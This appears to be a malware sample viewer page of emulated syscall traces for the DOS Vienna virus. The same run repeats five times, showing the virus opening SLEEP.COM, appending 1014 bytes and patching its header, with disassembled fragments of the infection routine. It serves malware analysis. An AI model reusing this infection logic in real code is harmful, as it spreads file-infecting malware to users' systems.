Sample viewer

vx.netlux.org/Virus.DOS.Vienna.1014

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:49:47.438812211Z 47 PC: 12e71 | Get disk transfer address
2018-12-17T22:49:47.440482361Z 26 PC: 12eaa | Set disk transfer address
2018-12-17T22:49:47.441592998Z 78 PC: 12fb9 | Find first file
2018-12-17T22:49:47.447889649Z 67 PC: 12ff1 | Get or set file attributes
2018-12-17T22:49:47.454598949Z 67 PC: 13001 | Get or set file attributes
2018-12-17T22:49:47.468167493Z 61 PC: 1300b | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:49:47.47340198Z 87 PC: 13017 | Get or set file date and time
2018-12-17T22:49:47.475434435Z 44 PC: 13021 | Get time 0x13021: and dh, 7
0x13024: jne 0x13036
0x13026: mov ah, 0x40
0x13028: mov cx, 5
0x1302b: mov dx, si
0x1302d: add dx, 0x8a
0x13031: int 0x21
0x13033: jmp 0x130b6
0x13036: mov ah, 0x3f
0x13038: mov cx, 3
0x1303b: mov dx, 0xa
0x1303e: add dx, si
0x13040: int 0x21
0x13042: jb 0x130b6
0x13044: cmp ax, 3
0x13047: jne 0x130b6
0x13049: mov ax, 0x4202
0x1304c: mov cx, 0
0x1304f: mov dx, 0
0x13052: int 0x21
2018-12-17T22:49:47.477440354Z 63 PC: 13042 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:47.481765111Z 66 PC: 13054 | Move file pointer
2018-12-17T22:49:47.483079323Z 64 PC: 13077 | Write file or device (Write 1014 bytes on handle 5)
2018-12-17T22:49:47.489283379Z 66 PC: 13089 | Move file pointer
2018-12-17T22:49:47.490598178Z 64 PC: 13097 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:47.494891481Z 87 PC: 130a5 | Get or set file date and time
2018-12-17T22:49:47.496900818Z 62 PC: 130a9 | Close file
2018-12-17T22:49:47.502158636Z 67 PC: 130b6 | Get or set file attributes
2018-12-17T22:49:47.508706579Z 42 PC: 130ba | Get date 0x130ba: cmp dh, 0xb
0x130bd: je 0x130dd
0x130bf: push ds
0x130c0: mov ah, 0x1a
0x130c2: mov dx, word ptr [si]
0x130c4: mov ds, word ptr es:[si + 2]
0x130c8: int 0x21
0x130ca: pop ds
0x130cb: xor ax, ax
0x130cd: xor bx, bx
0x130cf: xor dx, dx
0x130d1: mov di, 0x100
0x130d4: xor si, si
0x130d6: mov di, 0x100
0x130d9: push di
0x130da: xor di, di
0x130dc: ret
0x130dd: mov byte ptr [0x470], 0x32
0x130e2: nop
0x130e3: mov bx, 0x3f3
2018-12-17T22:49:47.511090841Z 26 PC: 130ca | Set disk transfer address
2018-12-17T22:49:47.512292043Z 9 PC: 12e26 | Display string (String= 'Hello - Copyright S & S International, 1990 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10011,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:26:58.510443976Z 47 PC: 12e71 | Get disk transfer address
2018-12-25T12:26:58.512732273Z 26 PC: 12eaa | Set disk transfer address
2018-12-25T12:26:58.51402311Z 78 PC: 12fb9 | Find first file
2018-12-25T12:26:58.519998513Z 67 PC: 12ff1 | Get or set file attributes
2018-12-25T12:26:58.526653064Z 67 PC: 13001 | Get or set file attributes
2018-12-25T12:26:58.543340732Z 61 PC: 1300b | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:26:58.549770329Z 87 PC: 13017 | Get or set file date and time
2018-12-25T12:26:58.551645271Z 44 PC: 13021 | Get time 0x13021: and dh, 7
0x13024: jne 0x13036
0x13026: mov ah, 0x40
0x13028: mov cx, 5
0x1302b: mov dx, si
0x1302d: add dx, 0x8a
0x13031: int 0x21
0x13033: jmp 0x130b6
0x13036: mov ah, 0x3f
0x13038: mov cx, 3
0x1303b: mov dx, 0xa
0x1303e: add dx, si
0x13040: int 0x21
0x13042: jb 0x130b6
0x13044: cmp ax, 3
0x13047: jne 0x130b6
0x13049: mov ax, 0x4202
0x1304c: mov cx, 0
0x1304f: mov dx, 0
0x13052: int 0x21
2018-12-25T12:26:58.554042224Z 63 PC: 13042 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:26:58.560179456Z 66 PC: 13054 | Move file pointer
2018-12-25T12:26:58.561737623Z 64 PC: 13077 | Write file or device (Write 1014 bytes on handle 5)
2018-12-25T12:26:58.581692136Z 66 PC: 13089 | Move file pointer
2018-12-25T12:26:58.589653979Z 64 PC: 13097 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:26:58.601628815Z 87 PC: 130a5 | Get or set file date and time
2018-12-25T12:26:58.606907733Z 62 PC: 130a9 | Close file
2018-12-25T12:26:58.622396146Z 67 PC: 130b6 | Get or set file attributes
2018-12-25T12:26:58.632690012Z 42 PC: 130ba | Get date 0x130ba: cmp dh, 0xb
0x130bd: je 0x130dd
0x130bf: push ds
0x130c0: mov ah, 0x1a
0x130c2: mov dx, word ptr [si]
0x130c4: mov ds, word ptr es:[si + 2]
0x130c8: int 0x21
0x130ca: pop ds
0x130cb: xor ax, ax
0x130cd: xor bx, bx
0x130cf: xor dx, dx
0x130d1: mov di, 0x100
0x130d4: xor si, si
0x130d6: mov di, 0x100
0x130d9: push di
0x130da: xor di, di
0x130dc: ret
0x130dd: mov byte ptr [0x470], 0x32
0x130e2: nop
0x130e3: mov bx, 0x3f3
2018-12-25T12:26:58.635854146Z 26 PC: 130ca | Set disk transfer address
2018-12-25T12:26:58.637044746Z 9 PC: 12e26 | Display string (String= 'Hello - Copyright S & S International, 1990 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10011,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:26:59.256546699Z 47 PC: 12e71 | Get disk transfer address
2018-12-25T12:26:59.258713913Z 26 PC: 12eaa | Set disk transfer address
2018-12-25T12:26:59.260387046Z 78 PC: 12fb9 | Find first file
2018-12-25T12:26:59.266525931Z 67 PC: 12ff1 | Get or set file attributes
2018-12-25T12:26:59.27357919Z 67 PC: 13001 | Get or set file attributes
2018-12-25T12:26:59.290025239Z 61 PC: 1300b | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:26:59.297117849Z 87 PC: 13017 | Get or set file date and time
2018-12-25T12:26:59.299746561Z 44 PC: 13021 | Get time 0x13021: and dh, 7
0x13024: jne 0x13036
0x13026: mov ah, 0x40
0x13028: mov cx, 5
0x1302b: mov dx, si
0x1302d: add dx, 0x8a
0x13031: int 0x21
0x13033: jmp 0x130b6
0x13036: mov ah, 0x3f
0x13038: mov cx, 3
0x1303b: mov dx, 0xa
0x1303e: add dx, si
0x13040: int 0x21
0x13042: jb 0x130b6
0x13044: cmp ax, 3
0x13047: jne 0x130b6
0x13049: mov ax, 0x4202
0x1304c: mov cx, 0
0x1304f: mov dx, 0
0x13052: int 0x21
2018-12-25T12:26:59.310044621Z 63 PC: 13042 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:26:59.317007625Z 66 PC: 13054 | Move file pointer
2018-12-25T12:26:59.3187431Z 64 PC: 13077 | Write file or device (Write 1014 bytes on handle 5)
2018-12-25T12:26:59.331935276Z 66 PC: 13089 | Move file pointer
2018-12-25T12:26:59.333724312Z 64 PC: 13097 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:26:59.344350589Z 87 PC: 130a5 | Get or set file date and time
2018-12-25T12:26:59.346551432Z 62 PC: 130a9 | Close file
2018-12-25T12:26:59.354692327Z 67 PC: 130b6 | Get or set file attributes
2018-12-25T12:26:59.454860019Z 42 PC: 130ba | Get date 0x130ba: cmp dh, 0xb
0x130bd: je 0x130dd
0x130bf: push ds
0x130c0: mov ah, 0x1a
0x130c2: mov dx, word ptr [si]
0x130c4: mov ds, word ptr es:[si + 2]
0x130c8: int 0x21
0x130ca: pop ds
0x130cb: xor ax, ax
0x130cd: xor bx, bx
0x130cf: xor dx, dx
0x130d1: mov di, 0x100
0x130d4: xor si, si
0x130d6: mov di, 0x100
0x130d9: push di
0x130da: xor di, di
0x130dc: ret
0x130dd: mov byte ptr [0x470], 0x32
0x130e2: nop
0x130e3: mov bx, 0x3f3
2018-12-25T12:26:59.458267775Z 26 PC: 130ca | Set disk transfer address
2018-12-25T12:26:59.459460264Z 9 PC: 12e26 | Display string (String= 'Hello - Copyright S & S International, 1990 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":7,"TimeBased":true,"OriginalID":10011,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:01.382058781Z 47 PC: 12e71 | Get disk transfer address
2018-12-25T12:27:01.383222981Z 26 PC: 12eaa | Set disk transfer address
2018-12-25T12:27:01.38490499Z 78 PC: 12fb9 | Find first file
2018-12-25T12:27:01.39167291Z 67 PC: 12ff1 | Get or set file attributes
2018-12-25T12:27:01.39794961Z 67 PC: 13001 | Get or set file attributes
2018-12-25T12:27:01.416401233Z 61 PC: 1300b | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:01.423813101Z 87 PC: 13017 | Get or set file date and time
2018-12-25T12:27:01.425338902Z 44 PC: 13021 | Get time 0x13021: and dh, 7
0x13024: jne 0x13036
0x13026: mov ah, 0x40
0x13028: mov cx, 5
0x1302b: mov dx, si
0x1302d: add dx, 0x8a
0x13031: int 0x21
0x13033: jmp 0x130b6
0x13036: mov ah, 0x3f
0x13038: mov cx, 3
0x1303b: mov dx, 0xa
0x1303e: add dx, si
0x13040: int 0x21
0x13042: jb 0x130b6
0x13044: cmp ax, 3
0x13047: jne 0x130b6
0x13049: mov ax, 0x4202
0x1304c: mov cx, 0
0x1304f: mov dx, 0
0x13052: int 0x21
2018-12-25T12:27:01.428722874Z 63 PC: 13042 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:01.43619371Z 66 PC: 13054 | Move file pointer
2018-12-25T12:27:01.437752646Z 64 PC: 13077 | Write file or device (Write 1014 bytes on handle 5)
2018-12-25T12:27:01.447215293Z 66 PC: 13089 | Move file pointer
2018-12-25T12:27:01.448743629Z 64 PC: 13097 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:01.456394777Z 87 PC: 130a5 | Get or set file date and time
2018-12-25T12:27:01.457902663Z 62 PC: 130a9 | Close file
2018-12-25T12:27:01.466580254Z 67 PC: 130b6 | Get or set file attributes
2018-12-25T12:27:01.477559216Z 42 PC: 130ba | Get date 0x130ba: cmp dh, 0xb
0x130bd: je 0x130dd
0x130bf: push ds
0x130c0: mov ah, 0x1a
0x130c2: mov dx, word ptr [si]
0x130c4: mov ds, word ptr es:[si + 2]
0x130c8: int 0x21
0x130ca: pop ds
0x130cb: xor ax, ax
0x130cd: xor bx, bx
0x130cf: xor dx, dx
0x130d1: mov di, 0x100
0x130d4: xor si, si
0x130d6: mov di, 0x100
0x130d9: push di
0x130da: xor di, di
0x130dc: ret
0x130dd: mov byte ptr [0x470], 0x32
0x130e2: nop
0x130e3: mov bx, 0x3f3
2018-12-25T12:27:01.47998548Z 26 PC: 130ca | Set disk transfer address
2018-12-25T12:27:01.482276235Z 9 PC: 12e26 | Display string (String= 'Hello - Copyright S & S International, 1990 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":7,"TimeBased":true,"OriginalID":10011,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:01.555090976Z 47 PC: 12e71 | Get disk transfer address
2018-12-25T12:27:01.557700827Z 26 PC: 12eaa | Set disk transfer address
2018-12-25T12:27:01.559019556Z 78 PC: 12fb9 | Find first file
2018-12-25T12:27:01.564992713Z 67 PC: 12ff1 | Get or set file attributes
2018-12-25T12:27:01.571094369Z 67 PC: 13001 | Get or set file attributes
2018-12-25T12:27:01.602802582Z 61 PC: 1300b | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:01.609521335Z 87 PC: 13017 | Get or set file date and time
2018-12-25T12:27:01.611388468Z 44 PC: 13021 | Get time 0x13021: and dh, 7
0x13024: jne 0x13036
0x13026: mov ah, 0x40
0x13028: mov cx, 5
0x1302b: mov dx, si
0x1302d: add dx, 0x8a
0x13031: int 0x21
0x13033: jmp 0x130b6
0x13036: mov ah, 0x3f
0x13038: mov cx, 3
0x1303b: mov dx, 0xa
0x1303e: add dx, si
0x13040: int 0x21
0x13042: jb 0x130b6
0x13044: cmp ax, 3
0x13047: jne 0x130b6
0x13049: mov ax, 0x4202
0x1304c: mov cx, 0
0x1304f: mov dx, 0
0x13052: int 0x21
2018-12-25T12:27:01.613809793Z 63 PC: 13042 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:01.62017343Z 66 PC: 13054 | Move file pointer
2018-12-25T12:27:01.621783531Z 64 PC: 13077 | Write file or device (Write 1014 bytes on handle 5)
2018-12-25T12:27:01.631111082Z 66 PC: 13089 | Move file pointer
2018-12-25T12:27:01.632663005Z 64 PC: 13097 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:01.639506023Z 87 PC: 130a5 | Get or set file date and time
2018-12-25T12:27:01.641942702Z 62 PC: 130a9 | Close file
2018-12-25T12:27:01.649645664Z 67 PC: 130b6 | Get or set file attributes
2018-12-25T12:27:01.659245713Z 42 PC: 130ba | Get date 0x130ba: cmp dh, 0xb
0x130bd: je 0x130dd
0x130bf: push ds
0x130c0: mov ah, 0x1a
0x130c2: mov dx, word ptr [si]
0x130c4: mov ds, word ptr es:[si + 2]
0x130c8: int 0x21
0x130ca: pop ds
0x130cb: xor ax, ax
0x130cd: xor bx, bx
0x130cf: xor dx, dx
0x130d1: mov di, 0x100
0x130d4: xor si, si
0x130d6: mov di, 0x100
0x130d9: push di
0x130da: xor di, di
0x130dc: ret
0x130dd: mov byte ptr [0x470], 0x32
0x130e2: nop
0x130e3: mov bx, 0x3f3
2018-12-25T12:27:01.662060453Z 26 PC: 130ca | Set disk transfer address
2018-12-25T12:27:01.663430964Z 9 PC: 12e26 | Display string (String= 'Hello - Copyright S & S International, 1990 ')